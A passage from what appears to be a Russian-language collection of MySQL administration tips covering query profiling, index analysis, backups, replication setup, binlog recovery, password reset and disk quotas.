${host} | cut -d: -f2) tcpdump -i eth0 -s 65535 -x -nn -q -tttt port 3306 and port ${port} > /root/tcpdumps/`date +%s`.tcpdump & mysql -e 'show innodb status\Gshow full processlist' > /root/tcpdumps/`date +%s`.innodbstatus pid=$! sleep 30 kill ${pid} fi Посмотрев лог ".innodbstatus" и убедившись, что это не ложное срабатывание, проанализировать активность связанного с незакрываемой транзакцией соединения можно выполнив команду: mk-query-digest --type=tcpdump --no-report --print файл.tcpdump В mk-query-digest также удобно использовать опцию --timeline, отображающую последовательность запросов в наглядном виде. Утилита mk-query-digest поставляется в пакете maatkit.

Расширенный анализ эффективности индексов в MySQL (доп. ссылка 1) [комментарии]

Для детального анализа особенностей использования индексов в MySQL удобно использовать утилиту mk-index-usage, входящую в пакет Maatkit (написан на языке Perl). По умолчанию утилита выявляет неиспользуемые индексы и предлагает готовые конструкции ALTER для их удаления. Дополнительно утилита может сохранять накопленную статистику по использованию индексов при реальной рабочей нагрузке и сохранять ее в виде SQL-таблиц для последующего анализа. В качестве источника используется лог запросов, включаемых опцией log-slow-queries или general_log. Простейший формат вызова выглядит как: mk-index-usage slow.log --host localhost При этом утилита построит детальный отчет на основе выполнения EXPLAIN-операции для каждого фигурирующего в логе запроса. Так как это достаточно ресурсоемкая операция, рекомендуется запустить на отдельной машине тестовый MySQL-сервер, перенести туда дамп анализируемой базы и лог медленных запросов, после чего выполнять анализ не на первичном сервере, а на его копии: mk-index-usage -h 127.0.0.1 -P 9999 -p XXXX slow_query.log \ --save-results-database h=127.0.0.1,P=12345,u=msandbox,p=msandbox,D=index_usage \ --create-save-results-database В данном случае параметр "--save-results-database" определяет в какую базу сохранять результаты анализа. После выполнения указанной команды в базе index_usage появятся следующие таблицы: mysql> show tables; | index_alternatives | | index_usage | | indexes | | queries | | tables | Несколько примеров просмотра статистики. Посмотрим какие запросы используют время от времени используют разные индексы и как выбранный индекс коррелирует с временем выполнения запроса: SELECT iu.query_id, CONCAT_WS('.', iu.db, iu.tbl, iu.idx) AS idx, variations, iu.cnt, iu.cnt / total_cnt * 100 AS pct FROM index_usage AS iu INNER JOIN ( SELECT query_id, db, tbl, SUM(cnt) AS total_cnt, COUNT(*) AS variations FROM index_usage GROUP BY query_id, db, tbl HAVING COUNT(*) > 1 ) AS qv USING(query_id, db, tbl); | query_id | | variations | cnt | pct | | 7675136724153707161 | mpb_wordpress.wp_posts.post_status | 2 | 18 | 97.5871 | | 7675136724153707161 mpb_wordpress.wp_posts.type_status_date | 2 | 728 | 2.4129 | .... В первой строке указано, что запрос с идентификатором 7675136724153707161 имеет два варианта использования индексов. Первый вариант использует индекс mpb_wordpress.wp_posts.post_status в 97% случаев, второй - индекс mpb_wordpress.wp_posts.type_status_date в 2% случаев. Посмотрим что из себя представляет запрос 7675136724153707161: mysql> select * from queries where query_id = 7675136724153707161\G query_id: 7675136724153707161 fingerprint: select * from wp_comments where comment_post_id = ? and comment_type not regexp ? and comment_approved = ? sample: SELECT * FROM wp_comments WHERE comment_post_ID = 2257 AND comment_type NOT REGEXP '^(trackback|pingback)$' AND comment_approved = '1' 1 row in set (0.00 sec) Теперь посмотрим для каких индексов имеется большое число альтернатив, какие индексы вызываются вместо других и при каких запросах: mysql> SELECT CONCAT_WS('.', db, tbl, idx) AS idx, GROUP_CONCAT(alt_idx) AS alternatives, GROUP_CONCAT(DISTINCT query_id) AS queries, SUM(cnt) AS cnt FROM index_alternatives GROUP BY db, tbl, idx HAVING COUNT(*) > 1 limit 2; | idx | alternatives | queries | cnt | | mpb_forum.f.PRIMARY | fud26_forum_i_c,fud26_forum_i_c,fud26_forum_i_lpi | 6095451542512376951,11680437198542055892 | 20 | | mpb_forum.fud26_msg.fud26_msg_i_ta | PRIMARY,fud26_msg_i_a | 5971938384822841613 | 2 | Как видно первичные ключи преобладают над некоторыми индексами. Некоторые другие утилиты из пакета Maatkit: mk-archiver - архивирование строк из таблицы MySQL в другую таблицу или в файл; mk-deadlock-logger - выявление и сохранение информации о взаимных блокировках; mk-duplicate-key-checker - поиск дублирующихся индексов и внешних ключей; mk-find - аналог утилиты find для выполнения поиска по таблицам и выполнения действий над результатами; mk-heartbeat - мониторинг задержки при выполнении репликации; mk-kill - удаляет запросы, соответствующие определенным критериям; mk-loadavg - следит за нагрузкой на базу и выполняет указанные действия при обнаружении перегрузки; mk-log-player - позволяет повторно выполнить запросы из лога; mk-parallel-dump/mk-parallel-restore - создание и восстановление дампа таблиц в параллельном режиме; mk-purge-logs - чистит бинарный лог в соответствии с заданными правилами; mk-query-advisor - анализирует запросы и выявляет возможные проблемы; mk-query-digest - парсит лог и анализирует, фильтрует и преобразует запросы в логе, формируя в итоге полезный суммарный отчет; mk-query-profiler - выполняет SQL-запросы и выводит статистику или измеряет активность других процессов; mk-table-checksum - генерация контрольных сумм с целью проверки целостности реплицированных данных; mk-table-sync - эффективная синхронизация содержимого нескольких таблиц; mk-upgrade - запускает запрос одновременно на нескольких серверах и проверяет идентичность ответов; mk-variable-advisor - анализирует переменные MySQL и выявляет возможные проблемы; mk-visual-explain - выводит результат выполнения EXPLAIN-запроса в древовидном виде.

Профилирование запросов в MySQL (доп. ссылка 1) Автор: Василий Лукьянчиков [комментарии]

Начиная с версии 5.0.37 в MySQL Community Server появился удобный инструмент для профилирования запросов - директивы "SHOW PROFILES" и "SHOW PROFILE". Директива "SHOW PROFILES" показывает список запросов, выполненных в рамках текущей сессии и время выполнения каждого запроса. Число отображаемых запросов определяется переменной сессии profiling_history_size, которая имеет значение по умолчанию 15, максимальное 100. В список попадают все запросы кроме "SHOW PROFILES" и "SHOW PROFILE", включая синтаксически неверные. Профилирование действует в течении сессии. По завершении сессии информация профайлинга теряется. Включаем профилирование: mysql> set profiling=1; Query OK, 0 rows affected (0.00 sec) Через некоторое время смотрим результат: mysql> show profiles; | Query_ID | Duration | Query | 2 | 0.00010300 | create table a1 (id int not null auto_increment) ... Директива "SHOW PROFILE" показывает подробную информацию об этапах выполнения отдельного запроса. По умолчанию, выводится информация о последнем запросе. Для указания на конкретный запрос используется опция FOR QUERY n, где значение n соответствует значению Query_ID из списка, формируемого директивой "SHOW PROFILES". mysql> show profile for QUERY 2; | Status | Duration | | (initialization) | 0.000039 | | checking permissions | 0.00004 | | creating table | 0.004034 | | After create | 0.000294 | | query end | 0.000009 | | freeing items | 0.000012 | | logging slow query | 0.000004 | где Status - состояние потока, а Duration - время выполнения в секундах. Информацию, аналогичную результату работы "SHOW PROFILE", можно получить из таблицы PROFILING базы INFORMATION_SCHEMA. Например, следующие команды являются эквивалентными: SHOW PROFILE FOR QUERY 2; SELECT STATE, FORMAT(DURATION, 6) AS DURATION FROM INFORMATION_SCHEMA.PROFILING WHERE QUERY_ID = 2; Ссылки Подробное описание синтаксиса с указанием всех возможных опций: http://dev.mysql.com/doc/refman/5.0/en/show-profiles.html Пример использования профайлинга для оптимизации сложных запросов: http://dev.mysql.com/tech-resources/articles/using-new-query-profiler.html

Резервное копирование MySQL с использованием LVM снапшотов в Debian Linux (доп. ссылка 1) [комментарии]

Утилита mylvmbackup (http://lenz.homelinux.org/mylvmbackup/) позволяет автоматизировать создание резервных копий БД MySQL с минимальным временем простоя базы. Процесс создания бэкапа состоит из следующих фаз: установка блокировки на таблицы, инициирование сброса кэшей на диск, создание LVM снапшота директории с MySQL таблицами, снятие блокировки. Так как время создания снапшота очень мало, простой базы сводится к минимуму при полном сохранении целостности. Пример использования утилиты для системы на которой уже работает MySQL, директория с БД (/var/lib/mysql) размещена на LVM разделе и в системе доступен раздел /dev/sdb на котором достаточно для создания временных LVM снапшотов. # df -h ... /dev/mapper/server1-mysql 8.9G 170M 8.3G 2% /var/lib/mysql Имя LVM группы server1, имя раздела с данными MySQL - mysql. # pvdisplay --- Physical volume --- PV Name /dev/sda5 VG Name server1 PV Size 29.52 GB / not usable 3.66 MB ... # vgdisplay --- Volume group --- VG Name server1 System ID Format lvm2 ... # lvdisplay --- Logical volume --- LV Name /dev/server1/mysql VG Name server1 ... Диск /dev/sdb имеет один раздел /dev/sdb1, занимающий все пространство диска. Подключаем его к имеющемуся LVM группе server1 с целью увеличения свободного места, которое потребуется для работы со снапшотами. Дополнительные LVM разделы создавать не нужно. # pvcreate /dev/sdb1 # vgextend server1 /dev/sdb1 Устанавливаем пакет mylvmbackup: # aptitude install mylvmbackup Изучаем руководство по mylvmbackup и при необходимости меняем файл конфигурации /etc/mylvmbackup.conf под свои нужды: $ man mylvmbackup По умолчанию бэкапы будут сохраняться в директорию /var/cache/mylvmbackup/backup. Простейшая команда для создание резервной копии (параметры можно указать в файле конфигурации) MyISAM таблиц: mylvmbackup --user=root --password=пароль --mycnf=/etc/mysql/my.cnf \ --vgname=server1 --lvname=mysql --backuptype=tar Пример для InnoDB таблиц: mylvmbackup --user=root --password=пароль --innodb_recover --skip_flush_tables \ --mycnf=/etc/mysql/my.cnf --vgname=server1 --lvname=mysql --backuptype=tar В опции --vgname указываем имя LVM группы, а в опции --lvname имя LVM раздела с данными. После выполнения команды проверяем корректность создания резервной копии: ls -l /var/cache/mylvmbackup/backup -rw-r--r-- 1 root root 246847 2010-01-27 19:17 backup-20100127_191658_mysql.tar.gz В созданном tar.gz файле находятся две директории: backup с архивом таблиц, который можно просто распаковать в рабочую директорию /var/lib/mysql при проведении восстановления данных. backup-pos с копией файла конфигурации my.cnf.

Как уменьшить время завершения работы СУБД MySQL при использовании InnoDB (доп. ссылка 1) [комментарии]

Иногда для завершения работы MySQL сервера с таблицами в формате InnoDB требуется слишком много времени, из-за необходимости сброса всех буферов. Если процесс завершить принудительно, то данные не потеряются, но при следующем запуске будет инициирован значительно более долгий процесс восстановления из лога транзакций. Один из способов минимизировать время завершения сервера, за какое-то время перед выключением MySQL включить функцию предварительного сброса буферов: mysql> set global innodb_max_dirty_pages_pct = 0; Далее периодически смотрим объем не сброшенных буферов: $ mysqladmin ext -i10 | grep dirty | Innodb_buffer_pool_pages_dirty | 1823484 | ... | Innodb_buffer_pool_pages_dirty | 1821293 | ... | Innodb_buffer_pool_pages_dirty | 1818938 | Дожидаемся когда значение Innodb_buffer_pool_pages_dirty приблизится к нулю и выполняем процесс завершения работы, сведя время простоя сервера к минимуму.

Выбор типа хранилища MySQL: MyISAM или Innodb ? (доп. ссылка 1) (доп. ссылка 2) Автор: Matt Yonkovit [комментарии]

Если вы создаете БД по обстоятельствам и не уверены как база будет использоваться, выбирайте Innodb. Innodb следует использовать: Когда взаимодействие с базой имеет характер OLTP (http://ru.wikipedia.org/wiki/OLTP) Когда требуются транзакции. Когда нужна высокая надежность хранения и быстрое восстановление после сбоя. Innodb хорошо справляется со смешанной нагрузкой (select/update/delete/insert). Минусы Innodb: могут возникать deadlock, не свойственные MyISAM; Медленнее выполняются insert операции и работа с блобами; Не поддерживается полнотекстовый поиск; Проблемы с производительностью COUNT(*); Для Innodb нет поддержки mysqlhotcopy; С MyISAM есть одна нехорошая проблема, таблица может на ровном месте отказаться работать до выполнения REPAIR TABLE. Случается такое крайне редко, но и этого хватает. Пример: http://blog.lexa.ru/2008/10/05/vash_mysql___to_esche_g.html Поэтому с для MyISAM рекомендуется организовать периодический запуск mysqlcheck через cron. Из-за особенности организации блокировки (в MyISAM блокировка на уровне таблицы, в Innodb - на уровне строк), MyISAM имеет смысл использовать, когда преобладают операции insert или select, но крайне мало delete или update. Когда можно обойтись без транзакций. Когда выполняются запросы, характерные для OLAP (http://ru.wikipedia.org/wiki/OLAP) Когда таблица используется для хранения лога (поддержка конкурирующих insert); Когда много запросов вида Select count(*). Когда нужно задействовать средства полнотекстового поиска. Такие альтернативные хранилища, как PBXT, Innodb plugin, XtraDB, Maria, Falcon, еще находятся на стадии разработки и имеют экспериментальный характер.

Временное ведение лога всех запросов к MySQL (доп. ссылка 1) [комментарии]

Использование опций конфигурации log-slow-queries и general_log, позволяющих вести полный лог медленных или всех запросов, требует перезапуска mysql для включения или выключения ведения логов, что неудобно в ситуации, когда нужно проанализировать запросы только в текущий момент. Для анализа запросов (не через локальный сокет) на лету можно воспользоваться сетевым сниффером. Перехватываем и записываем срез трафика MySQL в файл: tcpdump -i eth0 port 3306 -s 1500 -w tcpdump.out Выделяем из дампа SQL запросы, используя утилиту tshark из комплекта сниффера Wireshark (http://www.wireshark.org/): tshark -r tcpdump.out -d tcp.port==3306,mysql -T fields -e mysql.query > query_log.out Удаляем из полученного лога пустые и неинформативные строки: cat query_log.out | grep -vE "^(commit.*|autocommit.*|rollback.*|)$" | awk '{print $0 ";"}' > query_log_no_blank.out Полученный лог удобно анализировать утилитой mysqlsla (http://hackmysql.com/mysqlsla)

Автоматический тюнинг MySQL сервера при помощи ПО MySQLTuner (доп. ссылка 1) [комментарии]

MySQLTuner (http://rackerhacker.com/mysqltuner/) представляет собой Perl скрипт, анализирующий статистику работы MySQL сервера и на ее основе дающий рекомендации по оптимизации настойки СУБД. Загружаем и выполняем скрипт: wget http://mysqltuner.com/mysqltuner.pl chmod +x mysqltuner.pl ./mysqltuner.pl Вводим логин и пароль для подключения к MySQL, после чего скрипт выводит наиболее интересные параметры статистики работы СУБД и рекомендации по тюнингу настроек, примерно в таком виде: General recommendations: Add skip-innodb to MySQL configuration to disable InnoDB Add skip-isam to MySQL configuration to disable ISAM Run OPTIMIZE TABLE to defragment tables for better performance Enable the slow query log to troubleshoot bad queries When making adjustments, make tmp_table_size/max_heap_table_size equal Reduce your SELECT DISTINCT queries without LIMIT clauses Increase table_cache gradually to avoid file descriptor limits Your applications are not closing MySQL connections properly Variables to adjust: query_cache_size (> 16M) tmp_table_size (> 32M) max_heap_table_size (> 16M) table_cache (> 64)

Синхронизация master и slave MySQL, несмотря на конфликтные запросы Автор: Dmitry Molchanov [комментарии]

Иногда возникает необходимость догнать мастер несмотря на конфликтные запросы из relay-лога. Вместо того чтобы, для разрешения конфликтов, вручную выполнять 2 команды можно в крайних ситуациях использовать скрипт: #!/bin/sh n=1 until [ $n = "0" ];do n=`mysql -Be 'show slave status \G' | grep Seconds_Behind_Master| cut -f2 -d: | tr -d " "` echo $n; if [ $n = "NULL" ]; then mysql -Be ' SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1; start slave;' fi; sleep 1 done Для быстрой и полной синхронизации небольшой таблицы: (http://www.mysqlperformanceblog.com/2008/06/29/resyncing-table-on-mysql-slave/) LOCK TABLE tbl WRITE; SELECT * FROM table INTO OUTFILE '/tmp/tbl.txt'; DELETE FROM tbl; LOAD DATA INFILE 'tmp/tbl.txt' INTO TABLE tbl; UNLOCK TABLES; Другой вариант: RENAME TABLE rep TO rep_maint; SELECT * FROM rep_maint INTO OUTFILE '/tmp/rep.txt'; CREATE TABLE rep_new LIKE rep_maint; LOAD DATA INFILE '/tmp/rep.txt' INTO TABLE rep_new; RENAME TABLE rep_maint TO rep_old, rep_new TO rep;

Восстановление данных с поврежденной или случайно удаленной MySQL таблицы (доп. ссылка 1) (доп. ссылка 2) [обсудить]

Для восстановления случайно удаленной таблицы можно использовать для резервного копирования пакет Zmanda Recovery Manager (http://mysqlbackup.zmanda.com/), имеющий поддержку восстановления недостающей в бэкапе информации из бинарного лога изменений (MySQL binary log). Ведение лога транзакций включается в секции "[mysqld]" файла конфигурации: log-bin = /var/log/mysql/bin.log Определяем время удаления (DROP TABLE): mysql-zrm --action parse-binlogs --source-directory=/var/lib/mysql /sugarcrm/20060915101613 /var/lib/mysql/my-bin.000015 | 11013 | 06-09-12 06:20:03 | Xid = 4413 | COMMIT; /var/lib/mysql/my-bin.000015 | 11159 | 06-09-12 06:20:03 | Query | DROP TABLE IF EXISTS `accounts`; Имея инкрементальный бэкап binary log от 15 сентября, восстанавливаем из него данные, пропуская удаление таблицы: # mysql-zrm --action restore --backup-set sugarcrm \ --source-directory=/var/lib/mysql/ sugarcrm/20060915101613/ \ --stop-position 11014 # mysql-zrm --action restore --backup-set sugarcrm \ --source-directory=/var/lib/mysql/ sugarcrm/20060915101613/ \ --start-position 11160 Для получения данных из binary log также можно использовать стандартную программу mysqlbinlog. Предположим, что у нас есть бэкап от 5 мая. Переводим сервер в изолированный режим работы: mysqld --socket=/tmp/mysql_restore.sock --skip-networking Восстанавливаем данные из бэкапа: cat /backup/20080505.sql | mysql --socket=/tmp/mysql_restore.sock Делаем дамп данных из бинарного лога: mysqlbinlog /var/log/mysql/bin.123456 > /tmp/mysql_restore.sql Можно использовать выборку по дате или номеру позиции: mysqlbinlog --stop-date="2008-05-06 9:59:59" --start-date="2008-05-05 10:01:00" \ /var/log/mysql/bin.123456 > /tmp/mysql_restore.sql mysqlbinlog --stop-position="5647324" --start-position="5634521" \ /var/log/mysql/bin.123456 > /tmp/mysql_restore.sql Вручную удаляем лишнее и загружаем недостающие данные: cat /tmp/mysql_restore.sql| mysql --socket=/tmp/mysql_restore.sock

Как проверить корректность изменений в файле конфигурации MySQL (доп. ссылка 1) Автор: mysqlperformanceblog [комментарии]

Иногда возникают ситуации требующие предварительной проверки корректности файла конфигурации MySQL, что-то похожее на "configtest" в apache. Анализ файла конфигурации на наличие синтаксических ошибок производится при выполнении mysqld --help

Вычисление размера таблиц MySQL (доп. ссылка 1) (доп. ссылка 2) Автор: mysqlperformanceblog.com [комментарии]

Запрос для расчета размера таблиц начиная с MySQL 5.0: use information_schema; SELECT concat(table_schema,'.',table_name),concat(round(table_rows/1000000,2),'M') rows, concat(round(data_length/(1024*1024*1024),2),'G') DATA, concat(round(index_length/(1024*1024*1024),2),'G') idx, concat(round((data_length+index_length)/(1024*1024*1024),2),'G') total_size, round(index_length/data_length,2) idxfrac FROM TABLES ORDER BY data_length+index_length DESC LIMIT 10; | concat(table_schema,'.',table_name) | rows | DATA | idx | total_size | idxfrac | | art87.link_out87 | 37.25M | 14.83G | 14.17G | 29.00G | 0.96 | # | art87.article87 | 12.67M | 15.83G | 4.79G | 20.62G | 0.30 | Определение числа таблиц, суммарного размера строк, данных и индексов: SELECT count(*) TABLES, concat(round(sum(table_rows)/1000000,2),'M') rows, concat(round(sum(data_length)/(1024*1024*1024),2),'G') DATA, concat(round(sum(index_length)/(1024*1024*1024),2),'G') idx, concat(round(sum(data_length+index_length)/(1024*1024*1024),2),'G') total_size, round(sum(index_length)/sum(data_length),2) idxfrac FROM information_schema.TABLES; | TABLES| rows | DATA | idx | total_size | idxfrac | | 1538 | 1623.91M | 314.00G | 36.86G | 350.85G | 0.12 | После "FROM information_schema.TABLES" можно добавить дополнительный фильтр, например вывести информацию только для таблиц performance_log: ... WHERE table_name LIKE "%performance_log%"; Определение самых больших таблиц в БД: SELECT count(*) TABLES, table_schema,concat(round(sum(table_rows)/1000000,2),'M') rows, concat(round(sum(data_length)/(1024*1024*1024),2),'G') DATA, concat(round(sum(index_length)/(1024*1024*1024),2),'G') idx, concat(round(sum(data_length+index_length)/(1024*1024*1024),2),'G') total_size, round(sum(index_length)/sum(data_length),2) idxfrac FROM information_schema.TABLES GROUP BY table_schema ORDER BY sum(data_length+index_length) DESC LIMIT 10; |TABLES| table_schema | rows | DATA | idx | total_size | idxfrac | | 48 | cacti | 0.01M | 0.00G | 0.00G | 0.00G | 0.72 | | 17 | mysql | 0.00M | 0.00G | 0.00G | 0.00G | 0.18 | Объем данных в разрезе типа хранилища: SELECT engine, count(*) TABLES, concat(round(sum(table_rows)/1000000,2),'M') rows, concat(round(sum(data_length)/(1024*1024*1024),2),'G') DATA, concat(round(sum(index_length)/(1024*1024*1024),2),'G') idx, concat(round(sum(data_length+index_length)/(1024*1024*1024),2),'G') total_size, round(sum(index_length)/sum(data_length),2) idxfrac FROM information_schema.TABLES GROUP BY engine ORDER BY sum(data_length+index_length) DESC LIMIT 10; | engine | TABLES | rows | DATA | idx | total_size | idxfrac | | MyISAM | 1243 | 941.06M | 244.09G | 4.37G | 248.47G | 0.02 | | InnoDB | 280 | 682.82M | 63.91G | 32.49G | 96.40G | 0.51 | | MRG_MyISAM| 1 | 13.66M | 6.01G | 0.00G | 6.01G | 0.00 | | MEMORY | 14 | 0.00M | 0.00G | 0.00G | 0.00G | NULL |

Оптимизация MySQL для работы с большой Innodb базой. (доп. ссылка 1) (доп. ссылка 2) [комментарии]

innodb_buffer_pool_size - чем больше, тем лучне, например 70-80% от размера ОЗУ, но нет смысла устанавливать значение превышающее размер базы более чем на 10%. По идее нужно экспериментально вычислить сколько требуется памяти для системы, и отдать остальное под буферизацию с небольшим запасом, чтобы не допустить своппинг. innodb_log_file_size - зависит от требований к скорости восстановления после сбоя, 256Мб - хороший баланс между скоростью восстановления и производительностью системы; innodb_log_buffer_size=4M, 4Мб подходит для большинства ситуаций, за исключением случая работы с большими блоками данных, хранимых в Innodb таблицах; innodb_flush_logs_at_trx_commit=2 - если не важен ACID и после краха системы допустимо потерять транзакции за последние 1-2 секунды; innodb_thread_concurrency=8, значение по умолчанию вполне адекватно, можно попробовать уменьшить или увеличить и посмотреть на изменение производительности. innodb_flush_method=O_DIRECT - исключает двойную буферизацию и уменьшает воздействие на файл подкачки. Но следует соблюдать осторожность, если ваш RAID без аварийной батарейки. innodb_file_per_table - можно использовать, если число таблиц невелико. При разработке приложения можно обратить внимание на использование режиме READ-COMMITED (transaction-isolation=READ-COMITTED).

Бэкап больших MyISAM таблиц без длительной блокировки в MySQL (доп. ссылка 1) Автор: jabrusli [комментарии]

mysqldump лочит таблицы на запись и во время дампа база фактически простаивает. Решения: 1. Репликация и бэкап со слейва; 2. mysqlhotcopy, делает "read lock" на и копируются файлы баз, т.е.: FLUSH TABLES WITH READ LOCK; // копировать файлы MyISAM таблиц UNLOCK TABLES; FLUSH TABLES WITH READ LOCK может занять много времени т.к. он будет ждать окончания выполнений всех запущенных запросов. 3. Минимизация блокировки через использование снапшотов ФС: FLUSH TABLES WITH READ LOCK; Делаем снэпшот ФС, где лежат базы мускула UNLOCK TABLES; Копируем директории с базой или отдельные таблицы Отцепляем снэпшот Скрипт для Linux (использует LVM снапшот): http://lenz.homelinux.org/mylvmbackup/ Cкрипт для FreeBSD: (echo "FLUSH TABLES WITH READ LOCK;"; echo "\! ${MOUNT} -u -o snapshot /${SNAPPART}/.snap/backup /${SNAPPART}"; echo "UNLOCK TABLES;" ) | ${MYSQL} --user=root --password=`${CAT} ${MYSQLROOTPW}`

Включение лога медленных запросов в MySQL [обсудить]

в [mysqld] секции my.cnf: # Минимальное время запроса, которое не будет помещено в лог. long_query_time=10 # Файл в котором будут отображаться слишком долгие запросы. # можно использовать опцию -mysqld -log-slow-queries=file log-slow-queries=/var/log/mysqld/slowquery.log Для ведения полного лога всех запросов, нужно использовать опцию mysqld --log=allquery.log

Решение проблем с кодировкой при переносе дампа из mysql 4.1 в 5.0 (доп. ссылка 1) Автор: Alex Kuklin [обсудить]

В debian/testing (и наверное не только) mysqld собран с default charset latin1, что приводит к потере данных при загрузке дампов в utf8 независимо от настроек конкретной базы. Лекарство: в разделе [mysqld] в /etc/mysql/my.cnf character_set_server = utf8 collation_server = utf8_general_ci Вариант 2: Если база данных в utf8 и в дампе с ней нет SET NAMES utf8; делаю так cat mysql_dump.sql | mysql -u user -p dbname --default-character-set=utf8

Пример настройки master-master репликации в MySQL (доп. ссылка 1) [комментарии]

Шаг 1. Устанавливаем MySQL на два сервера: Master 1/Slave 2 ip: 192.168.16.4 Master 2/Slave 1 ip : 192.168.16.5 Шаг 2. Содержимое my.cnf сервера Master 1, являющегося ведущим по умолчанию: [mysqld] datadir=/var/lib/mysql socket=/var/lib/mysql/mysql.sock old_passwords=1 log-bin binlog-do-db=<database name> # input the database which should be replicated binlog-ignore-db=mysql # input the database that should be ignored for replication binlog-ignore-db=test server-id=1 [mysql.server] user=mysql basedir=/var/lib [mysqld_safe] err-log=/var/log/mysqld.log pid-file=/var/run/mysqld/mysqld.pid Шаг 3. На сервере Master 1, создаем аккакнт для slave сервера (затем перезапускаем mysql): mysql> grant replication slave on *.* to 'replication'@192.168.10.5 \ identified by 'slave'; Шаг 4. Содержимое my.cnf сервера Master 2, являющегося ведомым по умолчанию (slave): [mysqld] datadir=/var/lib/mysql socket=/var/lib/mysql/mysql.sock old_passwords=1 server-id=2 master-host = 192.168.16.4 master-user = replication master-password = slave master-port = 3306 [mysql.server] user=mysql basedir=/var/lib [mysqld_safe] err-log=/var/log/mysqld.log pid-file=/var/run/mysqld/mysqld.pid Шаг 5. Активируем ведомый сервер: mysql> start slave; mysql> show slave status\G; В отображенных параметрах поля Slave_IO_Running и Slave_SQL_Running должны содержать "YES". Шаг 6. На сервере Master 1 проверяем статус бинарного лога: mysql> show master status; +------------------------+----------+--------------+------------------+ | File | Position | Binlog_Do_DB | Binlog_Ignore_DB | +------------------------+----------+--------------+------------------+ |MysqlMYSQL01-bin.000008 | 410 | adam | | +------------------------+----------+--------------+------------------+ 1 row in set (0.00 sec) Сценарий master-slave реализован, переходим к настройке master-master. Шаг 7. На сервере Master2/Slave 1 редактируем my.cnf: [mysqld] datadir=/var/lib/mysql socket=/var/lib/mysql/mysql.sock # Default to using old password format for compatibility with mysql 3.x # clients (those using the mysqlclient10 compatibility package). old_passwords=1 server-id=2 master-host = 192.168.16.4 master-user = replication master-password = slave master-port = 3306 log-bin #information for becoming master added binlog-do-db=adam [mysql.server] user=mysql basedir=/var/lib [mysqld_safe] err-log=/var/log/mysqld.log pid-file=/var/run/mysqld/mysqld.pid Шаг 8. Создаем slave аккаунт на Master 2 для Master 1: mysql> grant replication slave on *.* to 'replication'@192.168.16.4 identified by 'slave2'; Шаг 9. Редактируем my.cnf на сервере Master 1, определив, что он является slave для Master 2: [mysqld] datadir=/var/lib/mysql socket=/var/lib/mysql/mysql.sock # Default to using old password format for compatibility with mysql 3.x # clients (those using the mysqlclient10 compatibility package). old_passwords=1 log-bin binlog-do-db=adam binlog-ignore-db=mysql binlog-ignore-db=test server-id=1 #information for becoming slave. master-host = 192.168.16.5 master-user = replication master-password = slave2 master-port = 3306 [mysql.server]user=mysqlbasedir=/var/lib Шаг 10. Перезапускаем оба MySQL сервера. Для Master 1 выполняем mysql> start slave; Для Master 2: mysql > show master status; Для Master 1: mysql> show slave status\G; В отображенных параметрах поля Slave_IO_Running и Slave_SQL_Running должны содержать "YES".

Техника изменения забытого административного MySQL пароля (доп. ссылка 1) Автор: Steve [комментарии]

Останавливаем MySQL: /etc/init.d/mysql stop Запускаем в режиме без проверки прав доступа: /usr/bin/mysqld_safe --skip-grant-tables & Соединяемся как root без пароля: mysql --user=root mysql Обновляем пароль: mysql> update user set Password=PASSWORD('новый пароль') WHERE User='root'; mysql> flush privileges; Завершаем работу mysqld_safe: fg "Ctrl+c" Запускаем MySQL в обычном режиме. /etc/init.d/mysql start

Автоматизация послеустановочной настройки MySQL Автор: Alexey Tsvetnov [комментарии]

#!/bin/sh # # mysql-after-setup # Copyright (c) 2006 Alexey Tsvetnov, vorakl@fbsd.kiev.ua # Version: 1.4 # # Run script after install MySQL to do: # 1. Drop database 'test' # 2. Set MySQL root password # 3. Delete all users and access except root@localhost # # tty echo off stty -echo # enter correct password while true do echo -n "Enter password: " && read pass1 && echo echo -n "Re-enter password: " && read pass2 && echo [ "${pass1}" = "${pass2}" ] && break echo " *** Error!" done # tty echo on stty echo echo "drop database test; delete from db where db like '%test%';\ update user set password=PASSWORD('$pass1') where user='root' and host='localhost';\ delete from user where password='';\ flush privileges;" | mysql -h 127.0.0.1 -u root mysql && echo "Done successfuly." exit 0

MySQL - квотирование баз под FreeBSD Автор: Pahanivo [комментарии]
Хитрости квотирования MySQL.
Каждую базу MySQL хранит в отдельном каталоге внутри datadir. MySQL работает под своим пользователем и соответственно создает файлы баз под им же. Соответственно квотирование в данном случае не возможно. Необходимо заставить его создавать файлы баз, влaдельцем которых будет конкретный квотируемый пользователь. Сделать это можно выставив бит SUID (4000) на каталог базы.
Для начала:
в ядре: options SUIDDIR в /etc/fstab: добавляем в список опций suiddir

В MySQL создаем базу. Находим каталог базы в datadir. По умолчанию он будет mysql:mysql.
Меняем владельца: chown sql-user databasedir теперь наш каталог sql-user:mysql Меняем права: chmod 4070 databasedir

Такая настройка заставит систему создавать файлы от имени владельца каталога (sql-user) причем сам пользователь не будет иметь к нему доступа. К нему будет иметь полный доступ MySQL (от группы mysql).
Теперь мы можем использовать квоты как для обычных файлов. При превышении квот MySQL будет генерить ошибку full disk что является нормальным явлением и корректно отрабатывается MySQL, хотя сопровождается некоторыми проблемами: при запросе на добавление в базу, превысившую квоты, запрос повисает, повисают также последующие запросы, которые можно снять только их убийством или освобождением дополнительного места на диске. При дефолтных настройках это сразу вызовет проблему, так как такие запросы займут все сетевые соединения. Поэтому необходимо ОБЯЗАТЕЛЬНО ограничить максимальное количество подключений одного пользователя MySQL. В /etc/my.cnf:
max_connections = 500 (всего коннектов) max_user_connections = 30 (максимум для одного пользователя)

Также возможно следующие - MySQL может пометить как поврежденные при останове сервера или когда временные файлы займут слишком много места на диске (второе судя по мануалам, не проверял). Лечится репаиром соотвествующих таблиц.
Убить повисшие процессы может только root базы если они достигли max_user_connections.
Не работает с таблицами innodb, так последние хранятся в одном месте независимо от базы.
Коментируйте.

Перенос данных из MySQL 4.0 в 4.1.x через mysqldump от нового MySQL Автор: Dmitry Molchanov [комментарии]

